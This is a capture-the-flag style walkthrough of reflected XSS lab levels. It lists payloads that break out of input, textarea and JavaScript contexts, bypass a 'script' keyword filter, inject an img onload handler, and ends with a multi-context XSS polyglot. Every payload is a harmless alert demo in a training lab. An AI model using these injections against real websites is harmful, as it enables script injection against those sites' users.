Perfecting our Payload

Level One

  • If we view the Page Source, We'll see the Adam name reflected in the code

  • Instead of entering our name, we are going to insert our payload

<script>alert('THM');</script>

Level Two

  • Viewing the page source, we can see your name reflected inside the value attribute of the input tag

  • If we try our usual payload, it wouldn't work as the script tags cannot run inside the input tag - So it's better we close the input tag first and then execute our script payload !

"><script>alert('THM');</script>

The "> which closes the value parameter and then closes the input tag

Level Three

  • We'll have to escape the textarea tag a little differently from the input one

  • So the payload would look something like

</textarea><script>alert('THM');</script>

Level Four - Tricky One !

  • Entering our name into the form, we'll see it reflected on the page

  • This level looks similar to level one, but upon inspecting the page source, we'll see our name gets reflected in some JavaScript code

  • We'll have to escape the existing JavaScript command

  • The ' closes the field specifying the name

  • The ; signifies the end of the current command

  • The // at the end makes anything after it a comment rather than executable code

';alert('THM');//

Level Five

  • This level looks the same as level one, and our name also gets reflected in the same place

  • But if we try the <script>alert('THM');</script> payload, it won't work

  • We can see that it's filtering out our script word, since Js is not a case-sensitive language we can use this payload

<ScRiPt>alert('THM');</sCrIpT>

  • We can even use this payload

<sscriptcript>alert('THM');</sscriptcript>

Level Six

  • Similar to level two where we'll have to escape from the input tag, here we'll have to escape from the img tag

  • We can see that the < and > characters get filtered out from our payload, preventing us from escaping the img tag

  • So to bypass this, We can take advantage of the additional attributes of the IMG tag, such as the onload event

The onload event executes the code of your choosing once the image specified in the src attribute has loaded onto the web page

  • Let's now modify our payload to something like

/images/cat.png" onload="alert('THM');

XSS Polygot

  • An XSS polyglot is a string of text which can escape attributes, tags and bypass filters all in one

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */onerror=alert('THM') )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert('THM')//>\x3e
PreviousBlind XSSNextExploiting Blind XSS

Last updated